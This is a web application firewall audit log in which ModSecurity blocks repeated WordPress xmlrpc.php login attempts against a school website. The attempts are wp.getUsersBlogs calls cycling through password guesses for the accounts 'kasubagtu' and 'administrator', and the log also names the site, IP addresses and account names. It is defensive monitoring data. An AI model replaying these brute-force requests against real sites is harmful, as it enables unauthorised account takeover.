[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514208025849 4435 (- - -) Stopwatch2: 1745514208025849 4435; combined=3129, p1=393, p2=2591, p3=0, p4=0, p5=85, sr=80, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1e86116-Z-- --2e69fd6a-A-- [25/Apr/2025:00:04:28 +0700] aApvHN5yz20UX9VrdZPLTQAAAFc 103.236.140.4 59648 103.236.140.4 8181 --2e69fd6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2e69fd6a-C-- wp.getUsersBlogs kasubagtu marketing2021 --2e69fd6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e69fd6a-E-- --2e69fd6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514268189295 5330 (- - -) Stopwatch2: 1745514268189295 5330; combined=3827, p1=452, p2=3182, p3=0, p4=0, p5=123, sr=94, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e69fd6a-Z-- --f32b0f27-A-- [25/Apr/2025:00:05:28 +0700] aApvWGLuk3f9kLjsdTaJOAAAAJE 103.236.140.4 34008 103.236.140.4 8181 --f32b0f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f32b0f27-C-- wp.getUsersBlogs kasubagtu qweasd --f32b0f27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f32b0f27-E-- --f32b0f27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514328165496 5276 (- - -) Stopwatch2: 1745514328165496 5276; combined=3778, p1=448, p2=3153, p3=0, p4=0, p5=103, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f32b0f27-Z-- --596c2c39-A-- [25/Apr/2025:00:06:28 +0700] aApvlGLuk3f9kLjsdTaKKgAAAI0 103.236.140.4 36576 103.236.140.4 8181 --596c2c39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --596c2c39-C-- wp.getUsersBlogs kasubagtu 456321 --596c2c39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --596c2c39-E-- --596c2c39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514388308988 4872 (- - -) Stopwatch2: 1745514388308988 4872; combined=3417, p1=478, p2=2777, p3=0, p4=0, p5=94, sr=143, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --596c2c39-Z-- --9ee55670-A-- [25/Apr/2025:00:07:16 +0700] aApvxN5yz20UX9VrdZPNRAAAAE4 103.236.140.4 38592 103.236.140.4 8181 --9ee55670-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9ee55670-C-- wp.getUsersBlogs kasubagtu 1234%^&* --9ee55670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ee55670-E-- --9ee55670-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514436296778 6323 (- - -) Stopwatch2: 1745514436296778 6323; combined=4577, p1=614, p2=3754, p3=0, p4=0, p5=124, sr=161, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ee55670-Z-- --67f2e141-A-- [25/Apr/2025:00:07:28 +0700] aApv0MlQo524fhbIj1yNjgAAAAc 103.236.140.4 39088 103.236.140.4 8181 --67f2e141-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --67f2e141-C-- wp.getUsersBlogs kasubagtu administrator123 --67f2e141-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67f2e141-E-- --67f2e141-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514448080834 5439 (- - -) Stopwatch2: 1745514448080834 5439; combined=3911, p1=467, p2=3273, p3=0, p4=0, p5=100, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67f2e141-Z-- --181e7b76-A-- [25/Apr/2025:00:08:28 +0700] aApwDGLuk3f9kLjsdTaLVAAAAJA 103.236.140.4 41532 103.236.140.4 8181 --181e7b76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --181e7b76-C-- wp.getUsersBlogs kasubagtu mustang --181e7b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --181e7b76-E-- --181e7b76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514508354771 5381 (- - -) Stopwatch2: 1745514508354771 5381; combined=3834, p1=474, p2=3171, p3=0, p4=0, p5=109, sr=87, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --181e7b76-Z-- --af5d3174-A-- [25/Apr/2025:00:09:28 +0700] aApwSPiVYlyO1xhz7yO41QAAAMk 103.236.140.4 43560 103.236.140.4 8181 --af5d3174-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af5d3174-C-- wp.getUsersBlogs kasubagtu cowboys --af5d3174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af5d3174-E-- --af5d3174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514568199097 5736 (- - -) Stopwatch2: 1745514568199097 5736; combined=4117, p1=542, p2=3376, p3=0, p4=0, p5=115, sr=90, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af5d3174-Z-- --f8d11d7b-A-- [25/Apr/2025:00:10:28 +0700] aApwhPiVYlyO1xhz7yO5ZQAAAMg 103.236.140.4 46158 103.236.140.4 8181 --f8d11d7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f8d11d7b-C-- wp.getUsersBlogs administrator password --f8d11d7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d11d7b-E-- --f8d11d7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514628203090 5085 (- - -) Stopwatch2: 1745514628203090 5085; combined=3856, p1=452, p2=3207, p3=0, p4=0, p5=113, sr=89, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d11d7b-Z-- --d0263a49-A-- [25/Apr/2025:00:11:28 +0700] aApwwGLuk3f9kLjsdTaNRQAAAJU 103.236.140.4 48826 103.236.140.4 8181 --d0263a49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d0263a49-C-- wp.getUsersBlogs administrator smkn22-jkt.sch.id --d0263a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0263a49-E-- --d0263a49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514688290830 5330 (- - -) Stopwatch2: 1745514688290830 5330; combined=4188, p1=515, p2=3490, p3=0, p4=0, p5=108, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0263a49-Z-- --8c205707-A-- [25/Apr/2025:00:12:28 +0700] aApw_GLuk3f9kLjsdTaNywAAAI0 103.236.140.4 51134 103.236.140.4 8181 --8c205707-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 242 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8c205707-C-- wp.getUsersBlogs administrator smkn22-jkt_sch_id123456 --8c205707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c205707-E-- --8c205707-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514748335589 4936 (- - -) Stopwatch2: 1745514748335589 4936; combined=3859, p1=445, p2=3226, p3=0, p4=0, p5=109, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c205707-Z-- --fa921958-A-- [25/Apr/2025:00:13:28 +0700] aApxOGLuk3f9kLjsdTaOgQAAAIs 103.236.140.4 53642 103.236.140.4 8181 --fa921958-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fa921958-C-- wp.getUsersBlogs administrator tests --fa921958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa921958-E-- --fa921958-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514808000723 4839 (- - -) Stopwatch2: 1745514808000723 4839; combined=3579, p1=431, p2=2945, p3=0, p4=0, p5=116, sr=89, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa921958-Z-- --b565ad57-A-- [25/Apr/2025:00:14:28 +0700] aApxdMlQo524fhbIj1yR-gAAAAs 103.236.140.4 56128 103.236.140.4 8181 --b565ad57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b565ad57-C-- wp.getUsersBlogs administrator admini --b565ad57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b565ad57-E-- --b565ad57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514868329379 4872 (- - -) Stopwatch2: 1745514868329379 4872; combined=3709, p1=408, p2=3115, p3=0, p4=0, p5=108, sr=86, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b565ad57-Z-- --eccf0233-A-- [25/Apr/2025:00:15:08 +0700] aApxnMlQo524fhbIj1ySggAAABc 103.236.140.4 57616 103.236.140.4 8181 --eccf0233-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eccf0233-C-- wp.getUsersBlogs administrator 1234%^&* --eccf0233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eccf0233-E-- --eccf0233-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514908395882 4931 (- - -) Stopwatch2: 1745514908395882 4931; combined=3679, p1=448, p2=3040, p3=0, p4=0, p5=115, sr=87, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eccf0233-Z-- --ad320023-A-- [25/Apr/2025:00:15:28 +0700] aApxsPiVYlyO1xhz7yO9AQAAANc 103.236.140.4 58384 103.236.140.4 8181 --ad320023-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad320023-C-- wp.getUsersBlogs administrator 1234560 --ad320023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad320023-E-- --ad320023-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514928682845 4522 (- - -) Stopwatch2: 1745514928682845 4522; combined=3385, p1=368, p2=2873, p3=0, p4=0, p5=85, sr=72, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad320023-Z-- --a0f80a22-A-- [25/Apr/2025:00:16:28 +0700] aApx7GLuk3f9kLjsdTaQZwAAAIo 103.236.140.4 60508 103.236.140.4 8181 --a0f80a22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a0f80a22-C-- wp.getUsersBlogs administrator brandon --a0f80a22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0f80a22-E-- --a0f80a22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514988277956 5399 (- - -) Stopwatch2: 1745514988277956 5399; combined=4264, p1=517, p2=3562, p3=0, p4=0, p5=109, sr=109, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0f80a22-Z-- --c5eb2c2b-A-- [25/Apr/2025:00:17:28 +0700] aApyKMlQo524fhbIj1yU8gAAAA8 